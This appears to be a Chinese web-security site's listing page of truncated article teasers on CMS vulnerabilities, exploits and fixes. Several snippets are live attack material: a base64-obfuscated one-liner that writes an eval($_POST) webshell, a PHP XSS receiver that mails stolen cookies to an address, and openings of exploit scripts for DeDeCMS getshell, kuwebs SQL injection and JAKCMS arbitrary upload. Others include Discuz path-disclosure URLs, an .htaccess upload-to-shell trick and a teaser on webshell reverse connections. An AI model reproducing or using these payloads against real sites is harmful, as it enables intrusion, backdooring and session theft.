JXCMS 0day及修复 - 网站安全 - 自学php关注热度:46

by t00ls精迅CMS（Jxcms）是基于采用网络中已经成熟、稳定的技术PHP+MYSQL开发而成，利用本系统您可以很方便地管理自己的网站。本系统是一款由文章模型、采集管理、广告系统、会员中心..[详情]

一些一句话变型 - 网站安全 - 自学php关注热度:18

?php @fputs(fopen(base64_decode(bG9zdC5waHA=),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==));?script language=php@fputs(fopen(base64_decode(bG9zdC5waHA=),w),base64_dec.....[详情]

360eshop安全网店系统0day及修复 - 网站安全 - 自学关注热度:30

标题: 360eshop安全网店系统0day内容: 360eshop安全网店系统 采用FCK编译器 版本：2.6.4.1 测试平台：IIS6测试方法：..[详情]

AdaptCMS 2.0.1多个安全缺陷及修复 - 网站安全 - 自学关注热度:13

标题: AdaptCMS 2.0.1 Multiple security vulnerabilities作者: Stefan Schurtz影响版本: AdaptCMS 2.0.1测试成功开发网站: http://www.adaptcms.com/ www.2cto.com状态:已修复缺陷描述：AdaptCMS 2.....[详情]

WordPress插件CevherShare 2.0 SQL注射缺陷及修复 - 网站关注热度:29

影响版本: WordPress CevherShare 2.0 plugin开发者: http://phpkode.com/下载地址: http://phpkode.com/download/s/cevhershare.zip测试平台: Ubuntu-Linux缺陷代码页面：cevhershare/cevhershare-admin.....[详情]

DZ 论坛爆路径总结 - 网站安全 - 自学php关注热度:24

1、manyou/admincp.php?my_suffix=%0A%0DSlhack2、ucenter/control/admin/db.php3、uc_server/control/admin/db.php4、forum.php/admin.php/XXXXXXX.php5、source/class/class_core.php摘自：少龙blog..[详情]

千脑SQL注入与文件上传及修复方案 - 网站安全关注热度:16

作者：路人甲简要描述：1.千脑文件上传页面可以修改URL参数id,把文件上传到任意注册用户目录里.成因:上传文件之前未对上传者身份进行验证.2.同时存在SQL注入,可以以数据库root权限,远..[详情]

友情路过漏洞之家 - 网站安全 - 自学php关注热度:12

俺去找点小漏洞...结果找到了 漏洞之家 - 国内首家多元化漏洞发布修复平台 好霸气哦！！可惜没有找到学校教务网的0day，仔细看看原来是在不网上收集的站啊。于是就有了想检测下的..[详情]

114啦网址导航v1.15后台拿shell及修复 - 网站安全关注热度:14

By:yiz我测试的版本是V1.15 网上都是V1.13的 于是下载回来看了下 。后台 点击模块管理---分类模块--添加模块直接添加后缀为php或asp的 都可以内容就是马的内容。马地址 在admin\tpls\tpls\mai..[详情]

酷纬企业网站管理系统本地包含漏洞及修复 - 网关注热度:11

漏洞文件：inc/ajax.php漏洞代码：?phpheader(#39;Content-Type:text/html; charset=utf-8#39;);$absolutepath = $_GET[#39;absolutepath#39;];require_once($absolutepath.#39;inc/common.inc.php#39.....[详情]

asp网上商城cookies注入漏洞及修复 - 网站安全 - 自关注热度:21

############################################################################## Title: asp网上商城cookies注入漏洞# Time：2011-09-25# Team:makebugs# Author: 晴天小铸###########################.....[详情]

XSS获取远程路径并发送到邮件 - 网站安全 - 自学关注热度:17

?php$ip = $_SERVER[#39;REMOTE_ADDR#39;];$to=#39;wangmin@yeah.net#39;;$referer = $_SERVER[#39;HTTP_REFERER#39;];$cookie = $_GET[#39;c#39;];$agent = $_SERVER[#39;HTTP_USER_AGENT#3.....[详情]

AACMS 注射0day及修复 - 网站安全 - 自学php关注热度:17

include_once #39;common.php#39;;$keyword = $_REQUEST[#39;keyword#39;]; //.....!@#$%^*if(empty($keyword)) sexit($lang[#39;arg_error#39;]);$where = #39;#39;;$where .= title LIK.....[详情]

kuwebs 0day及修复 - 网站安全 - 自学php关注热度:27

?phperror_reporting(E_ERROR);print_r(#39;+---------------------------------------------------------------------+kuwebs cms sql injection expHome: www.hkmjj.comwww.2cto.com+-----------------.....[详情]

域名管理面板跳转任意修改导致控制控制其他域关注热度:31

其实这次还是无意中发现的，一个朋友的域名在某IDC注册，点管理的时候发现的问题，他会有一个链接供跳转，不过这个链接可以任意改，如下个链接http://www.2cto.com /apilogin.asp?d_name=[隐..[详情]

ideacms文章管理系统漏洞及修复 - 网站安全 - 自学关注热度:13

#39;\admin\admin_upfile.asp%#39;略 dim folderList,folderNum,i,folderAttr,fileList,fileNum,j,fileAttr,folder,filedir,filename,lastLevelPath dim dirTemplate : dirTemplate=../Upload dim .....[详情]

驾校培训网站管理系统 v1.0 漏洞及修复 - 网站安关注热度:17

%Set rsnews=Server.CreateObject(ADODB.RecordSet)sql=update news set hits=hits+1 where id=cstr(request(id))conn.execute sql*/单纯的reuqest()，并没用指定是request.querystring(),还是re.....[详情]

最新DZ 7.2爆路径0day及修复 - 网站安全 - 自学php关注热度:16

这里只是说下方法，在要爆DZ 7.2 bbs的网站后面加上以下代码访问，即可爆出。manyou/admincp.php?my_suffix=%0A%0DTOBY57，引号不算。例如:http://www.2cto.com /manyou/admincp.php?my_suffix=%0A%0DTOBY5.....[详情]

记一次非主流绕过VirtualWall非法信息拦截专家的经关注热度:15

老鸟飞。一点点菜笔记。前晚看坛子里30JB悬赏过VirtualWall 非法信息拦截专家。作为屌丝。看到JB哪有不心动的。于是PM了试试。打开目标站点看了一下用的是易想商务网慧聪网风格V2.5 的..[详情]

DeDeCMS(织梦)变量覆盖0day getshell - 网站安全 - 自学关注热度:25

#!usr/bin/php -w?phperror_reporting(E_ERROR);set_time_limit(0);print_r(#39;DEDEcms Variable CoverageExploit Author: [url]www.heixiaozi.com[/url] [url]www.webvul.com[/url]);echo \r\n;if(.....[详情]

COOKIE注入经典原理 - 网站安全 - 自学php关注热度:53

大家好,我是初学者,在上一讲中,我们学习了搜索型注入的有关知识,今天我们再来学学另一种不常见的注入方法cookie注入在讲之前,我们还是来回顾下ASP脚本中Request对象的知识吧,上面几讲..[详情]

PHP系统暴绝对路径的方法收集 - 网站安全 - 自学关注热度:19

1、加引号#39;这个最常用2、变参数类型，比如把id=1改为id=a等 有时很有效果3、乱添数据,比如把id=1改为id=1111111111111111111111......等 有时很有效果4、text.php?aa[]=xx5、利用php的max_execution_tim..[详情]

FeitecCMS V2.0漏洞及修复 - 网站安全 - 自学php关注热度:31

# Title: FeitecCMS V2.0 漏洞# Time：2011-09-23# Team:makebugs# Author: 缘分#############################################################################39;PS在分析之前，没看什么时候的代码.....[详情]

php后台插一句话的思路 - 网站安全 - 自学php关注热度:25

首先介绍下php的各种标签：1)：?php ?demo:?php echo test;?这个标签现在程序大多都是使用的这种标签！大家都不陌生了，这里就不多介绍了！2)：? echo test; ?这种标签是在以前很普遍的一种用..[详情]

FCKeditor上传Getshell不要忘记htaccess - 网站安全 - 自关注热度:49

By LengF有些服务器开启了.htaccess文件上传，那么经常碰到fckeditor的就可以利用该文件上传一个phpshell。1.创建一个.htaccess文件，内容如下：FilesMatch _php.gifSetHandler application/x-httpd-php.....[详情]

Protecting against XSS - 网站安全 - 自学php关注热度:40

Where to start? Let me start by telling you that most of thebooks you read are wrong. The code samples you copy of the internet to do a specific task are wrong (the.....[详情]

JAKCMS PRO <= 2.2.5远程任意文件上传漏洞及修复关注热度:41

标题: JAKCMS PRO = 2.2.5 Remote Arbitrary File Upload Exploit作者: EgiX下载地址: http://www.jakcms.com/影响版本n: 2.2.5测试平台: Windows 7 and Debian 6.0.2?php/* --------------.....[详情]

PunBB PHP Forum 1.3.5 Cross Site Scripting(含修复) - 网站安关注热度:17

Affected Software : PunBB PHP ForumSeverity : MediumLocal/Remote : RemoteAuthor : @drk1wi[Summary]Just for those whom it might concern.These vulnerabilities have been identifi.....[详情]

35刺猬建站系统危险过滤不全导致命令执行缺陷及关注热度:27

简要描述：刺猬建站是35互联推出的新一代标准化网站建设服务，极大地降低了建站和更新成本。刺猬建站功能齐全、方便易用，深受中小企业欢迎。此次漏洞属于危险代码过滤不全所致..[详情]

PHP Webshell下的端口反弹 - 网站安全 - 自学php关注热度:30

sunzn:phpspy2011 中的 Back Connect 怎么弄都不能反弹回来，在网上找了段代码，测试成功了，但自己看了下，这段代码貌似也是从 phpspy 中分离出来的。使用方法：需要将以下代码保存为一个..[详情]